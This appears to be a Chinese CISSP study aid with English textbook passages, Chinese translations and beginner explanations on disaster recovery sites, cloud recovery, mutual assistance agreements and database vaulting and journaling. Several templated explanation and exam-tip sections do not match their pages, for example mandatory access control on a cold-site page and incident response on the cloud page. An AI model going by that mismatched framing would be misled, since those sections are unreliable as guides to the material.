冷站点设置 冷站点的设置在电影Boiler Room中有很好的体现,该片讲述了一家地下 投资公司通过电话营销向潜在客户兜售虚假的药品投资交易。 在这个虚构 案例中,"灾难"是人为造成的,但概念基本相同,尽管时机截然不同。 在面临曝光和执法突击检查的威胁下,该公司建立了一座附近的空置建筑, 里面仅有一排排电话摆在布满灰尘的混凝土地板上,模拟一个冷恢复站点。 诚然,这项工作既是虚构的,也是非法的,但它说明了为业务连续性而维 护冗余故障转移恢复站点的真实且合法的理由。 研究各种类型的恢复站点,然后考虑哪种最符合您的特定业务需求和 预算。 冷站点是最便宜的选项,或许也是最实用的。 温站点包含启动恢复 运营所需的数据链路和预配置设备,但没有可用的数据或信息。 最昂贵的 选项是热站点,它完全复制了您现有的业务基础设施,并可在短时间内接 管主站点。 冷站点的主要优势是成本相对较低——在站点闲置时,无需维护计算基础架构, 也无需支付每月的电信费用。 然而,这种站点的缺点显而易见——从决定启用站 点到站点准备好支持业务运营之间存在巨大的延迟。 必须引入并配置服务器和 工作站,必须从备份磁带中恢复数据,通信链路必须激活或建立。

冷站点的启 用时间通常以周计算,使得快速恢复几乎不可能,且常常造成虚假的安全感。 此外,值得注意的是,激活并将业务转移至冷站点所需的时间、精力和成本巨 大,使得这种方法最难进行测试。

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

强制访问控制 MAC:MAC 由系统根据标签和级别强制决定访问。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1247 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

政府/军方、机密级别、标签、不可由用户随意改通常是 MAC。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
强制访问控制 MAC MAC 由系统根据标签和级别强制决定访问。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 32 / PDF P1248

第 1248 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Hot Sites A hot site is the exact opposite of the cold site. In this configuration, a backup facility is maintained in constant working order, with a full complement of servers, workstations, and communications links ready to assume primary operations responsibilities. The servers and workstations are all preconfigured and loaded with appropriate operating system and application software. The data on the primary site servers is periodically or continuously replicated to corresponding servers at the hot site, ensuring that the hot site has up-todate data. Depending on the bandwidth available between the sites, hot site data may be replicated instantaneously.

If that is the case, operators could move operations to the hot site at a moment's notice. If it's not the case, disaster recovery managers have three options to activate the hot site: If there is sufficient time before the primary site must be shut down, they can force replication between the two sites right before the transition of operational control. If replication is impossible, managers may carry backup tapes of the transaction logs from the primary site to the hot site and manually reapply any transactions that took place since the last replication.

If there are no available backups and it isn't possible to force replication, the disaster recovery team may simply accept the loss of some portion of the data. This should only be done when the loss is within the organization's recovery point objective (RPO). The advantages of a hot site are obvious—the level of disaster recovery protection provided by this type of site is unsurpassed. However, the cost is extremely high. Maintaining a hot site essentially doubles an organization's budget for hardware, software, and services and requires the use of additional employees to maintain the site. If you use a hot site, never forget that it has copies of your production data.

Be sure to provide that site with the same level of technical and physical security controls you provide at your primary site.

中文直译 / 整理

热站点 热站点是冷站点的完全相反。 在这种配置中,备份设施始终保持正常运行状态, 配备完整的服务器、工作站和通信链路,随时准备接管主要运营职责。 服务器 和工作站均已预先配置,并加载了相应的操作系统和应用程序软件。 主站点服务器上的数据会定期或连续复制到热站点的对应服务器上,以确保热 站点拥有最新数据。 根据站点之间的可用带宽,热站点数据可能实现即时复制。 如果是这种情况,操作人员可在瞬间将业务切换至热站点。 如果不是这种情况, 灾难恢复管理人员有三种选项来激活热站点: 如果在关闭主站点之前有足够的时间,他们可以在转移操作控制权之 前强制在两个站点之间进行复制。 如果无法进行复制,管理人员可以将主站点的事务日志备份磁带运送 到热站点,并手动重新应用自上次复制以来发生的所有事务。 如果没有可用的备份,也无法强制复制,灾难恢复团队可能只能接受部分 数据的丢失。 这种情况仅应在丢失量在组织的恢复点目标(RPO)范围内 时才进行。 热站点的优势显而易见——这种类型的站点所提供的灾难恢复保护水平无与伦 比。 然而,其成本极其高昂。 维护热站点基本上会使组织在硬件、软件和服务 上的预算翻倍,并需要额外的员工来维护该站点。

如果您使用热站点,请永远不要忘记它包含您的生产数据副本。 请确 保为该站点提供与您的主站点相同级别的技术和物理安全控制。

小白解释

场景先行:员工在家访问公司系统,流量要穿过家庭网络、互联网、防火墙、VPN、服务器。网络安全题就是让你判断问题发生在哪一层、用哪个控制放在什么位置。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:不分层就会乱选设备:该加密的地方装防火墙,该监测的地方却只做访问控制。

你作为负责人可以这样想:先定位网络层次,再决定是分段、过滤、加密、检测还是阻断。

本页术语用人话说:

程序:程序是一步一步怎么做。

OSI 模型:OSI 用七层结构理解网络通信,从物理层到应用层。

日志:日志记录系统和用户活动,用于监控、审计和调查。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

读完后用一句话复述:如果我是网络安全工程师,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1248 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是网络安全工程师在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Step-by-step、SOP 常对应 procedure。

网络题先定位层次,再判断协议、设备或攻击位置。

日志要保护完整性、时间同步和访问控制。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要以为防火墙能解决所有网络问题;它只是控制流量的一类工具。

本页术语拆解
程序 程序是一步一步怎么做。
OSI 模型 OSI 用七层结构理解网络通信,从物理层到应用层。
日志 日志记录系统和用户活动,用于监控、审计和调查。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 33 / PDF P1249

第 1249 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

If an organization wants to maintain a hot site but wants to reduce the expense of equipment and maintenance, it might opt to use a shared hot site facility managed by an outside contractor. However, the inherent danger in these facilities is that they may be overtaxed in the event of a widespread disaster and be unable to service all clients simultaneously. If your organization considers such an arrangement, be sure to investigate these issues thoroughly, both before signing the contract and periodically during the contract term. Another method of reducing the expense of a hot site is to use the hot site as a development or test environment.

Developers can replicate data to the hot site in real time both for test purposes and to provide a live replica of the production environment. This reduces costs by having the hot site provide a useful service to the organization even when it is not actively being used for disaster operations. Warm Sites Warm sites occupy the middle ground between hot and cold sites for disaster recovery specialists. They always contain the equipment and data circuits necessary to rapidly establish operations. As with hot sites, this equipment is usually preconfigured and ready to run appropriate applications to support an organization's operations.

Unlike hot sites, however, warm sites do not typically contain copies of the client's data. The main requirement in bringing a warm site to full operational status is the transportation of appropriate backup media to the site and restoration of critical data on the standby servers. Activation of a warm site typically takes at least 12 hours from the time a disaster is declared. This does not mean that any site that can be activated in less than 12 hours qualifies as a hot site, however; switchover times for most hot sites are often measured in seconds or minutes, and complete cutovers seldom take more than an hour or two.

Warm sites avoid significant telecommunications and personnel costs inherent in maintaining a near-real-time copy of the operational data environment. Like hot sites and cold sites, warm sites may also be obtained on a shared facility basis. If you choose this option, be sure that you have a “no lockout” policy written into your contract guaranteeing you the use of an appropriate facility even during a period of high demand. It's a good idea to take this concept one step further and physically inspect the facilities and the

中文直译 / 整理

如果一个组织希望维护热站点但想降低设备和维护成本,它可能会选择使用由 外部承包商管理的共享热站点设施。 然而,这些设施的固有风险是,在发生大 规模灾难时,它们可能超负荷运行,无法同时为所有客户提服务。 如果您的组 织考虑这种安排,请务必在签订合同前以及合同期间定期彻底调查这些问题。 减少热站点成本的另一种方法是将其用作开发或测试环境。 开发人员可以实时 将数据复制到热站点,既用于测试目的,也用于提供生产环境的实时副本。 这 样,即使热站点未被主动用于灾难操作,它也能为组织提供有用的服务,从而 降低成本。 温站点 温站点在灾难恢复专家眼中处于热站点与冷站点之间的中间位置。 它们始 终包含快速建立运营所需的设备和数据电路。 与热站点一样,这些设备通常已 预先配置好,可立即运行适当的应用程序以支持组织的运营。 然而,与热站点 不同的是,温站点通常不包含客户的数据副本。 要将温站点完全激活至运行状 态,主要要求是将适当的备份介质运输到该站点,并在备用服务器上恢复关键 数据。 温站点的激活通常在灾难宣布后至少需要12小时。 但这并不意味着任何能在 12小时内激活的站点都可视为热站点;

大多数热站点的切换时间通常以秒或分 钟计算,完整的切换很少超过一到两个小时。 温站点避免了维护操作数据环境近实时副本所固有的重大电信和人员成本。 与 热站点和冷站点类似,温站点也可以通过共享设施的方式获得。 如果您选择此 选项,请确保在合同中写入“不被排除”政策,以保证即使在需求高峰期也能 使用合适的设施。 最好进一步落实这一概念,亲自检查设施和

小白解释

场景先行:机房断电,业务部门问多久能恢复、最多会丢多少数据。BCP/DRP 不是背缩写,而是把业务能承受的中断时间和数据损失说清楚。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:只做备份但没测试,真正灾难时可能恢复不了。

你作为负责人可以这样想:先做业务影响分析,再定 RTO/RPO,最后设计备份、冗余和演练。

本页术语用人话说:

政策:政策是高层原则,说明必须遵守什么。

程序:程序是一步一步怎么做。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:RTO 问时间,RPO 问数据;这两个不要混。

读完后用一句话复述:如果我是业务连续性负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1249 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务连续性负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

Policy 高层、强制、稳定;Procedure 具体步骤。

Step-by-step、SOP 常对应 procedure。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:RTO 问时间,RPO 问数据;这两个不要混。

本页术语拆解
政策 政策是高层原则,说明必须遵守什么。
程序 程序是一步一步怎么做。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 34 / PDF P1250

三类安全计划:战略、战术、运营

长期方向、中期落地、短期日常要分清。

教材原文段落

contractor's operational plan to reassure yourself that the facility will indeed be able to back up the “no lockout” guarantee should push ever come to shove. Mobile Sites Mobile sites are nonmainstream alternatives to traditional recovery sites. They typically consist of self-contained trailers or other easily relocated units. These sites include all the environmental control systems necessary to maintain a safe computing environment. Larger corporations sometimes maintain these sites on a “fly-away” basis, ready to deploy them to any operating location around the world via air, rail, sea, or surface transportation.

Smaller firms might contract with a mobile site vendor in their local area to provide these services on an as-needed basis. If your disaster recovery plan depends on a workgroup recovery strategy, mobile sites are an excellent way to implement that approach. They are often large enough to accommodate entire (small!) workgroups. Mobile sites are usually configured as cold sites or warm sites, depending on the disaster recovery plan they are designed to support. It is also possible to configure a mobile site as a hot site, but this is unusual because you seldom know in advance where a mobile site will need to be deployed.

中文直译 / 整理

承包商的运营计划,以确认一旦真的需要,该设施确实能够兑现“不被排除” 的保证。 移动站点 移动站点是传统恢复站点的非主流替代方案。 它们通常由独立的拖车或其他易 于搬迁的单元组成。 这些站点包含维持安全计算环境所需的所有环境控制系统。 大型企业有时会以“可快速部署”方式维护这些站点,以便通过航空、铁路、 海运或陆路运输将其部署到全球任何运营地点。 小型企业则可能与本地的移动 站点供应商签订合同,按需获取这些服务。 如果您的灾难恢复计划依赖于工作组恢复策略,那么移动站点是实现 该方法的绝佳方式。 它们通常足够大,可以容纳整个(小型! )工作组。 移动站点通常根据其设计支持的灾难恢复计划配置为冷站点或温站点。 也可以 将移动站点配置为热站点,但这并不常见,因为通常无法提前预知移动站点需 要部署在何处。

小白解释

场景先行:公司准备上线一个新业务系统,技术团队说可以买设备,法务说要合规,业务说不能影响上线。安全治理就是让高层定方向:安全要服务业务目标,风险由谁接受,预算花在哪里。

这一页真正想让你理解的是:长期方向、中期落地、短期日常要分清。

把它放进公司里看,关键不是背定义,而是判断:如果没有治理,安全会变成各部门各做各的:有人只想省钱,有人只想堆工具,最后责任不清。

你作为负责人可以这样想:先定策略和责任,再把战略拆成战术计划和日常运营计划。

本页术语用人话说:

运营计划:运营计划是每天、每周、每月执行的具体活动。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要把治理理解成配置设备;治理是方向、责任和监督。

读完后用一句话复述:如果我是高层管理者 / CISO,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“三类安全计划:战略、战术、运营”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是高层管理者 / CISO在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日常操作、流程、任务安排常归 operational。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要把治理理解成配置设备;治理是方向、责任和监督。

本页术语拆解
运营计划 运营计划是每天、每周、每月执行的具体活动。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 35 / PDF P1251

第 1251 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Hardware Replacement Options One thing to consider when determining mobile sites and recovery sites in general is hardware replacement supplies. There are basically two options for hardware replacement supplies. One option is to employ “inhouse” replacement, whereby you store extra and duplicate equipment at a different but nearby location (that is, a warehouse on the other side of town). (In-house here means you own it already, not that it is necessarily housed under the same roof as your production environment.) If you have a hardware failure or a disaster, you can immediately pull the appropriate equipment from your stash.

The other option is an SLA-type agreement with a vendor to provide quick response and delivery time in the event of a disaster. However, even a 4-, 12-, 24-, or 48-hour replacement hardware contract from a vendor does not provide a reliable guarantee that delivery will actually occur. There are too many uncontrollable variables to rely on this second option as your sole means of recovery. Cloud Computing Many organizations now turn to cloud computing as their preferred disaster recovery option. Infrastructure-as-a-service (IaaS) providers, such as Amazon Web Services (AWS), Microsoft Azure, and Google Cloud, offer on-demand service at low cost.

Companies wishing to maintain their own data centers may choose to use these IaaS cloud providers as backup service providers. Storing ready-to-run images with cloud providers is often quite cost effective and allows the organization to avoid incurring most of the operating cost until the cloud site activates in a disaster. Organizations that already operate their technology resources in the cloud don't get a free pass on disaster recovery. They must also think about how they will handle issues that arise within their cloud environment. They should then design and configure their use of cloud services to take advantage of redundancy options, geographic dispersion, and similar considerations.

Organizations relying on cloud computing for their disaster recovery plan should consider entering into a resource capacity agreement with their cloud

中文直译 / 整理

硬件替换选项 在确定移动站点和一般恢复站点时,需要考虑的一个因素是硬件替换备件。 硬件替换备件基本上有两种选择。 一种选择是采用“内部”替换方式,即 在另一个但邻近的位置(例如,城镇另一侧的仓库)存储额外的重复设备。 (内部在这里意味着您已拥有这些设备,而非一定与生产环境位于同一屋 檐下。 )如果发生硬件故障或灾难,您可以立即从库存中取出合适的设备。 另一种选择是与供应商签订SLA类型的协议,以便在灾难发生时提供快速 响应和交付服务。 然而,即使与供应商签订了4小时、12小时、24小时或 48小时的硬件替换合同,也无法可靠保证交付一定会按时完成。 由于存在 太多不可控因素,不宜将此第二种选项作为唯一的恢复手段。 云计算 许多组织现在将云计算作为首选的灾难恢复方案。 基础设施即服务(IaaS)提 供商,如亚马逊网络服务(AWS)、微软Azure和谷歌云,以低成本提供按需 服务。 希望保留自有数据中心的公司可以选择这些IaaS云提供商作为备份服务 提供商。 将可立即运行的镜像存储在云提供商处通常成本效益很高,并且可以 让组织在灾难发生、云站点激活之前避免承担大部分运营成本。

已经在云中运营其技术资源的组织并不能免除灾难恢复的责任。 他们还必须 考虑如何处理云环境中出现的问题,并应设计和配置其云服务的使用方式, 以利用冗余选项、地理分散性以及其他类似考量。 依赖云计算进行灾难恢复计划的组织应考虑与云服务提供商签订资源容量协议

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1251 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 36 / PDF P1252

机密性:让该看的人看,不该看的人看不到

机密性重点是防泄露,同时不能妨碍授权访问。

教材原文段落

providers. This agreement ensures that the cloud provider will provide the resources needed to support disaster recovery operations. Mutual Assistance Agreements Mutual assistance agreements (MAAs) are also called reciprocal agreements. They provide an alternate processing option that doesn't require significant capital investment. Under an MAA, two organizations pledge to assist each other in the event of a disaster by sharing computing facilities or other technological resources.

They appear to be extremely cost effective at first glance—it's not necessary for either organization to maintain expensive alternate processing sites (such as the hot sites, warm sites, cold sites, and mobile processing sites described in the previous sections). Indeed, many MAAs are structured to provide one of the levels of service described. In the case of a cold site, each organization may simply maintain some open space in their processing facilities for the other organization to use in the event of a disaster. In the case of a hot site, the organizations may host fully redundant servers for each other.

However, many drawbacks inherent to MAAs prevent their widespread use: MAAs are difficult to enforce. The parties might trust each other to provide support in the event of a disaster. However, when push comes to shove, the nonvictim might renege on the agreement. A victim may have legal remedies available, but this doesn't help the immediate disaster recovery effort. Cooperating organizations should be located in relatively close proximity to each other to facilitate transportation of employees between sites. However, proximity means that both organizations may be vulnerable to the same threats.

An MAA won't do you any good if an earthquake levels your city and destroys processing sites for both participating organizations. Confidentiality concerns often prevent businesses from placing their data in the hands of others. These may be legal concerns (such as in the handling of healthcare or financial data) or business concerns (such as trade secrets or other intellectual property issues). Despite these concerns, an MAA may be a good disaster recovery solution for an organization, especially in cases where the agreement is between two

中文直译 / 整理

提供商。 该协议确保云服务提供商将提供支持灾难恢复操作所需的资源。 互助协议 互助协议(MAAs)也称为互惠协议。 它们提供了一种无需重大资本投资的替 代处理方案。 在MAA下,两个组织承诺在发生灾难时通过共享计算设施或其他 技术资源相互协助。 乍一看,它们似乎极具成本效益——任何一方都不必维持 昂贵的备用处理站点(如前几节所述的热站点、温站点、冷站点和移动处理站 点)。 事实上,许多MAA的结构旨在提供上述某一服务水平。 在冷站点的情况 下,每个组织可能只需在其处理设施中保留一些空闲空间,供另一组织在灾难 发生时使用。 在热站点的情况下,组织可能为彼此托管完全冗余的服务器。 然而,MAA固有的许多缺点阻碍了其广泛应用: MAA难以执行。 各方可能信任对方在灾难发生时提供支持。 然而,当情况 紧急时,非受灾方可能会违背协议。 受灾方可能有法律救济途径,但这无 助于立即的灾难恢复工作。 合作组织应彼此位于相对接近的位置,以便于员工在各站点之间通勤。 然 而, proximity 意味着两个组织可能面临相同的威胁。 如果一场地震摧毁 了你的城市,并毁掉了both参与组织的处理站点,那么 MAA 对你没有任 何帮助。

机密性顾虑常常使企业不愿将数据交由他人保管。 这些顾虑可能是法律方 面的(例如医疗或财务数据的处理),也可能是业务方面的(例如商业秘 密或其他知识产权问题)。 尽管存在这些担忧,对于一个组织而言,MAA 可能是一种良好的灾难恢复解决方 案,尤其是在协议涉及同一组织的两个

小白解释

场景先行:想象公司有一个客户订单系统:客户资料被别人看到是机密性问题,订单金额被偷偷改是完整性问题,系统打不开是可用性问题。教材这一页就是教你把事故先翻译成安全目标。

这一页真正想让你理解的是:机密性重点是防泄露,同时不能妨碍授权访问。

把它放进公司里看,关键不是背定义,而是判断:把泄露、篡改、宕机混在一起,就会选错控制措施。

你作为负责人可以这样想:先判断事故破坏了 CIA 哪一项,再选择对应控制:防泄露、防篡改、保可用。

本页术语用人话说:

成本效益:安全控制不能无限堆钱,要用合理成本降低最重要的风险。

机密性:机密性让该看的人能看,不该看的人看不到。

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

读完后用一句话复述:如果我是业务系统负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“机密性:让该看的人看,不该看的人看不到”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是业务系统负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

CISSP 喜欢考成本收益:控制成本不应明显超过被降低的风险价值。

加密、访问控制、分类、培训都常用于保护机密性。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要把所有安全问题都归成“被黑了”。考试会逼你分清到底是泄露、篡改还是中断。

本页术语拆解
成本效益 安全控制不能无限堆钱,要用合理成本降低最重要的风险。
机密性 机密性让该看的人能看,不该看的人看不到。
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 37 / PDF P1253

第 1253 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

internal units or subsidiaries of the same organization who have an incentive to cooperate. Database Recovery Many organizations rely on databases to process and track operations, sales, logistics, and other activities vital to their continued viability. For this reason, it's essential that you include database recovery techniques in your disaster recovery plans. It's a wise idea to have a database specialist on the DRP team who can provide input as to the technical feasibility of various ideas. After all, you shouldn't allocate several hours to restore a database backup when it's impossible to complete a restoration in less than half a day.

In the following sections, we'll cover the three main techniques used to create off-site copies of database content: electronic vaulting, remote journaling, and remote mirroring. Each one has specific benefits and drawbacks, so you'll need to analyze your organization's computing requirements and available resources to select the option best suited to your firm and within the boundaries of your RPO. Selecting solutions that lose data beyond your RPO pose unwarranted risk, whereas selecting those that are more aggressive than your RPO may incur unnecessary costs. Electronic Vaulting In an electronic vaulting scenario, database backups are moved to a remote site using bulk transfers.

The remote location may be a dedicated alternative recovery site (such as a hot site) or simply an off-site location managed within the company or by a contractor for the purpose of maintaining backup data. If you use electronic vaulting, remember that there may be a significant delay between the time you declare a disaster and the time your database is ready for operation with current data. If you decide to activate a recovery site, technicians will need to retrieve the appropriate backups from the electronic vault and apply them to the soon-to-be production servers at the recovery site.

中文直译 / 整理

内部单位或子公司,且它们有合作动力的情况下。 数据库恢复 许多组织依赖数据库来处理和跟踪运营、销售、物流以及其他对其持续生存至 关重要的活动。 因此,将数据库恢复技术纳入您的灾难恢复计划至关重要。 建 议在DRP团队中配备一位数据库专家,以便对各种方案的技术可行性提供意见。 毕竟,如果在半天内无法完成数据库恢复,就不应分配数小时用于恢复数据库 备份。 在以下章节中,我们将介绍三种用于创建数据库内容异地副本的主要技术:电 子归档、远程日志记录和远程镜像。 每种技术都有其特定的优势和缺点,因此 您需要分析组织的计算需求和可用资源,以选择最适合贵公司且符合您RPO边 界的选择。 选择导致数据丢失超过RPO的方案会带来不必要的风险,而选择比 RPO更激进的方案则可能产生不必要的成本。 电子 vaulting 在 电子vaulting 场景中,数据库备份通过批量传输被移至远程站点。 远程位 置可以是专用的备用恢复站点(例如热站点),也可以是公司内部或由承包商 管理的、用于维护备份数据的异地位置。 如果您使用电子保险库,请记住,在您宣布灾难发生与数据库准备好使用最新 数据运行之间,可能存在显著延迟。

如果您决定激活恢复站点,技术人员需要 从电子保险库中检索适当的备份,并将其应用到恢复站点即将投入生产的服务 器上。

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

灾难恢复计划 DRP:DRP 关注 IT 系统、数据和基础设施如何恢复。

恢复点目标 RPO:RPO 是最多能接受丢失多少时间范围的数据。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1253 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

RTO 是多久恢复,RPO 是能丢多少数据。

RPO 问数据:最多丢到哪个时间点。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
灾难恢复计划 DRP DRP 关注 IT 系统、数据和基础设施如何恢复。
恢复点目标 RPO RPO 是最多能接受丢失多少时间范围的数据。
学习单元 38 / PDF P1254

第 1254 页学习单元

这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

教材原文段落

Be careful when considering vendors for an electronic vaulting contract. Definitions of electronic vaulting vary widely within the industry. Don't settle for a vague promise of “electronic vaulting capability.” Insist on a written definition of the service that will be provided, including the storage capacity, bandwidth of the communications link to the electronic vault, and the time necessary to retrieve vaulted data in the event of a disaster. As with any type of backup scenario, be certain to periodically test your electronic vaulting setup. A great method for testing backup solutions is to give disaster recovery personnel a “surprise test,” asking them to restore data from a certain day.

It's important to know that electronic vaulting introduces the potential for significant data loss. In the event of a disaster, you will only be able to recover information as of the time of the last vaulting operation. Remote Journaling With remote journaling, data transfers are performed in a more expeditious manner. Data transfers still occur in a bulk transfer mode, but they occur on a more frequent basis, usually once every hour and sometimes more frequently.

Unlike electronic vaulting scenarios, where entire database backup files are transferred, remote journaling setups transfer copies of the database transaction logs containing the transactions that occurred since the previous bulk transfer. Remote journaling is similar to electronic vaulting in that transaction logs transferred to the remote site are not applied to a live database server but are maintained in a backup device. When a disaster is declared, technicians retrieve the appropriate transaction logs and apply them to the production database, bringing the database up to the current production state. Remote Mirroring

中文直译 / 整理

在考虑电子保险库合同时,请谨慎选择供应商。 行业内对电子保险库的 定义差异很大。 不要满足于模糊的“具备电子保险库功能”的承诺。 坚持要 求提供书面的服务定义,包括存储容量、与电子保险库通信链路的带宽,以 及在灾难发生时检索保险库数据所需的时间。 与任何类型的备份场景一样,请务必定期测试您的电子归档设置。 测试备份解 决方案的一个绝佳方法是给灾难恢复人员一个“突击测试”,要求他们从某一 天恢复数据。 重要的是要了解,电子归档可能会导致大量数据丢失。 在发生灾难 时,您只能恢复到上一次归档操作时的数据。 远程日志记录 通过远程日志记录,数据传输以更迅速的方式进行。 数据传输仍然以批量传输 模式进行,但频率更高,通常每小时一次,有时更频繁。 与电子归档场景不同, 电子归档会传输整个数据库备份文件,而远程日志记录设置则传输自上一次批 量传输以来发生的事务的日志副本。 远程日志记录与电子归档类似,因为传输到远程站点的事务日志不会应用于活 动数据库服务器,而是保存在备份设备中。 当发生灾难时,技术人员会检索相 应的事务日志并将其应用于生产数据库,使数据库恢复到当前生产状态。 远程镜像

小白解释

场景先行:凌晨监控告警:某台服务器开始大量外连。你不能先忙着写报告,也不能直接关全网。事件响应要按顺序做:确认、遏制、根除、恢复、复盘。

这一页真正想让你理解的是:这一页属于本章连续内容,先读原文和译文,再看下方把概念拆成小白能理解的版本。

把它放进公司里看,关键不是背定义,而是判断:步骤乱了会扩大损失,或者破坏证据。

你作为负责人可以这样想:先保全证据和控制影响,再清除原因并恢复业务。

本页术语用人话说:

日志:日志记录系统和用户活动,用于监控、审计和调查。

常见误区:不要一上来就删除文件或重装系统;可能会破坏调查证据。

读完后用一句话复述:如果我是事件响应负责人,我会先识别风险,再选择控制,并保留能证明判断合理的证据。

考点提醒

考题会把“第 1254 页学习单元”包装成一个业务场景:有人要上线系统、处理事故、审供应商、分配权限或选择控制。

先抓题干里的角色和目标:这里更像是事件响应负责人在做判断。

最佳答案通常不是“最强工具”,而是能降低风险、符合职责、成本合理、还能留下证据的动作。

日志要保护完整性、时间同步和访问控制。

排除法提醒:不要一上来就删除文件或重装系统;可能会破坏调查证据。

本页术语拆解
日志 日志记录系统和用户活动,用于监控、审计和调查。
学习单元 39 / PDF P1255

第 1255 页学习单元

